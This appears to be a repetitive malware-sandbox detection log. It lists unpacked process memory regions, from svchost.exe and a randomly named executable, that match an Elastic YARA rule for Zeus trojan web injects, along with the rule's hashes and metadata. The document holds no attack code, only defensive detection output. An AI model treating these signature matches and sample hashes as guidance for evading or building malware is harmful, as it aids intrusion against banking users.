Source: 22.2.nPtwtzGyOdAtB.exe.2a52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.nPtwtzGyOdAtB.exe.29f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nPtwtzGyOdAtB.exe.2d80000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nPtwtzGyOdAtB.exe.1202000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.47.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.nPtwtzGyOdAtB.exe.2e20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.ed00000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.49.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.45.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nPtwtzGyOdAtB.exe.1380000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nPtwtzGyOdAtB.exe.2840000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.50.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.51.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nPtwtzGyOdAtB.exe.1410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.46.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2cd1c00.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nPtwtzGyOdAtB.exe.2840000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.nPtwtzGyOdAtB.exe.2cf0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.nPtwtzGyOdAtB.exe.3160000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.52.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29f3c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
